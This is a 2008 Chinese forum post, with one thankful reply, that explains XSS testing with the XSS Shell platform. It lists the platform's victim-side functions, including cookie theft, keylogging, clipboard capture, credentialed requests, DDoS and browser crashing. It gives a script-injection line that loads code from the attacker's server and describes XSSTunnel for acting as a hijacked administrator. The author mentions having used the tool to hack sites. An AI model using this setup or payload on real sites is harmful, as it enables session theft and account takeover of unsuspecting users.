xss测试步骤优化

sihanjishu

xss测试的一般步骤，总结了一下，尽量让xss测试的步骤简单高效一些。

测试xss一直很麻烦，一直想找个方法优化一下，经过几天的探索。终于找到了一个省时省力的方法。
首先介绍一下需要的工具。
xssshell是一个xss攻击平台。它首先需要搭建一个asp web服务器，将自身搭建起来，监听请求，
然后在xss地方，嵌入一个外部脚本文件，这个脚本文件会定期的访问xssshell服务器上的文件内容，然后执行。
这样就可以通过xssshell本身的服务，来动态的修改xss语句。（以前曾用这个黑过网站，刷过流量）
网上也有另一个xss攻击平台，是beEF，linux上的，因为搭建比较复杂，就不提了。如果需要更好的功能，可以尝试一下。
我的虚拟机是vpc，对linux的支持不好，没有办法。暂时不研究那个了。


第一步，搭建xssshell，首先下载xssshell，
官方地址  http://www.portcullis-security.com/16.php

修改默认的密码和数据库文件的路径，然后自己搭建一个简易的web服务器，可以使用net box搭建。
搭建好后，就可以访问管理员页面，查看其中的功能。

具体的功能包括

getCookie()
Get victims active cookie
getSelfHtml()
Get victim's current page HTML Code
alert(<message>)
Send message to victim
eval(<javascript code>)
Execute virtually anything in JS
prompt(<question>)
Play Truth or Dare
getKeyloggerData()
Get keylogger data
getMouseLog()
Get mouse log (every click in screen)
getClipboard()
Get clipboard data (only IE)
getInternalIP()
Get internal IP address (only Mozilla* + JVM)
checkVisitedLinks(<url list>)
Check victim's history (seperated by new line)
getPage(<Relative URL Path>)
Make a request with victim credentials
DDoS(<url>)
Distributed Denial of Service attack (use {RANDOM} in URL to avoid caching)
Crash()
Consume victim's CPU and force to crash/close.
GetLocation()
Get current URL of victim.

同时xssshell提供了一个实例程序，请参考具体的说明。


第二步，在目标xss页面中，想办法嵌入一个外部的脚本链接，也就是加入
<script src="你的xssshell.asp的网络地址"></script>，这样就可以了。

第三步，登录xssshell的后台管理页面，就可以发现，有个计算机上线了，而且还提示基本的国家标志。浏览器类型。
然后，你就可以对主机进行各种功能的请求。比如发送消息，获得cookie，执行脚本，访问网页等等操作。

第四步，此步是高级应用。使用XSSTunnel，详细功能可以参考官方的说明，可以通过xss进行一些服务请求。因为这些请求时通过xss进行的。所以，获得的权限和身份也是以对方的身份进行的。如果是网站的管理员点击了你的xss页面，那么，你就可以在本地通过xssstunnel进行一些管理员的操作。


xss测试的目的就是让开发人员相信，xss能够引起的足够危害。所以，只要达到自己的目标就可以了。
比如演示通过xss获得管理员权限，然后执行管理员操作。利用xss手机受害者的敏感信息等。到此为止就已经达到了测试的要求了，再深入就成hack了。
第一步是个一劳永逸的工作，测试的时候，主要就是在xss处嵌入脚本，然后等待受害者上线就可以了。
这样就精简了很多的流程，和一些重复的体力活。

[ 本帖最后由 sihanjishu 于 2008-8-22 13:37 编辑 ]

蜗牛来了

非常感谢，无意中发现的。等有环境了就搭建看看